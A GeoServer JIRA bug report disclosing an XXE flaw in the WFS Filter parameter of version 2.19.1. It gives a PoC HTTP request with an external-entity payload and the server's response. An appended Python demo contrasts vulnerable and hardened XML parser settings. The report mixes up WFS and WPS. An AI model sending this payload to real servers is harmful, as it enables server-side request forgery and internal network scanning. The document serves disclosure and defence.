[Geoserver-devel] [JIRA] (GEOS-10866) XXE in WFS component of the GeoServer version 2.19.1

say0b1 created an issue

GeoServer / Bug GEOS-10866

XXE in WFS component of the GeoServer version 2.19.1

Issue Type:

Bug

Affects Versions:

2.19.1

Assignee:

Unassigned

Components:

WFS

Created:

22/Feb/23 3:23 PM

Priority:

Medium

Reporter:

say0b1

The WPS component of the GeoServer version 2.19.1 is vulnerable to an XXE; an attacker can send crafted XML files with arbitrary locations in the Filter parameter. This XXE is limited, since only links pointing to an XSD file are allowed while using a DTD file was not permitted. However, this issue can still be exploited to perform SSRF attacks by scanning the local network for available hosts and open ports.

PoC:

HTTP Request:

POST /geoserver-geotec/wfs HTTP/1.1
Host: Example.com
Content-Length: 289
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Connection: close

request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f>+<!DOCTYPE+foo+[+<!ENTITY+xxe+SYSTEM+"http://target.com/test.xsd"+>]><Filter+><PropertyIsEqualTo><PropertyName>%26xxe%3b<Literal>Brussels</Literal></Filter>

HTTP Response:

HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 16:01:07 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 692
Connection: close
[...SNIP...]
Permissions-Policy: self
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache

<?xml version="1.0" ?>
<ServiceExceptionReport
   version="1.2.0"
   xmlns="http://www.opengis.net/ogc"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.opengis.net/ogc http://schemas.opengis.net/wfs/1.0.0/OGC-exception.xsd">
   <ServiceException code="XML getFeature request SAX parsing error" locator="org.geoserver.ows.XmlRequestReader">
      org.xml.sax.SAXParseException; systemId: http://taget.com/test.xsd; lineNumber: 1; columnNumber: 3; The content of elements must consist of well-formed character data or markup.
The content of elements must consist of well-formed character data or markup.
</ServiceException></ServiceExceptionReport>
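The mechanism behind the report, as an added example that is not part of the original issue or of GeoServer's code: the parser resolves the SYSTEM entity (i.e. issues the outbound request) before it ever checks whether the fetched content is well-formed, which is why the response above still names the systemId in a parse error. The block below reproduces that with Python's xml.sax, using a recording EntityResolver in place of the network so it runs offline; the internal URL 10.0.0.5:8080 and the canned response bodies are constructed for the demo. The same filter parsed with external general entities disabled makes no fetch at all.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Constructed filter body modelled on the PoC above (hypothetical internal target).
INTERNAL_URL = "http://10.0.0.5:8080/test.xsd"
CRAFTED_FILTER = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "' + INTERNAL_URL + '"> ]>'
    "<Filter><PropertyIsEqualTo><PropertyName>&xxe;</PropertyName>"
    "<Literal>Brussels</Literal></PropertyIsEqualTo></Filter>"
)


class RecordingResolver(EntityResolver):
    """Stands in for the network: records every external entity URL the parser
    asks for and hands back a canned body, so the demo needs no connectivity."""

    def __init__(self, remote_body):
        self.remote_body = remote_body
        self.fetched = []  # URLs the parser tried to retrieve

    def resolveEntity(self, publicId, systemId):
        self.fetched.append(systemId)
        src = InputSource(systemId)
        src.setCharacterStream(io.StringIO(self.remote_body))
        return src


def parse_filter(xml_text, resolve_external, remote_body="some text"):
    """Parse a FILTER document the way a naive reader would.

    resolve_external=True  -> weak setting: SYSTEM entities are fetched (SSRF).
    resolve_external=False -> hardened setting: the reference is ignored.
    Returns (list_of_urls_fetched, error_message_or_None).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    resolver = RecordingResolver(remote_body)
    parser.setEntityResolver(resolver)
    parser.setContentHandler(ContentHandler())
    error = None
    try:
        parser.parse(io.StringIO(xml_text))
    except xml.sax.SAXParseException as exc:
        # The fetch has already happened by the time the content is rejected,
        # which is the "limited XXE is still an SSRF" point of the report.
        error = str(exc)
    return resolver.fetched, error


if __name__ == "__main__":
    # Vulnerable configuration: the URL is requested even though the body is
    # not usable as XML, mirroring the error shown in the PoC response.
    print(parse_filter(CRAFTED_FILTER, True, remote_body="<a></b>"))
    # Hardened configuration: no outbound request, document still parses.
    print(parse_filter(CRAFTED_FILTER, False))
```

The hardened branch is the one a WFS/WPS request reader needs: reject or ignore external entities before any resolution takes place (for Java's Xerces-based parsers, setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the factory rejects the DOCTYPE outright). Note that whether the parser fails with a "well-formed" error or a connection error depends on what the target port answered, which is the oracle that turns this into a host and port scan.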
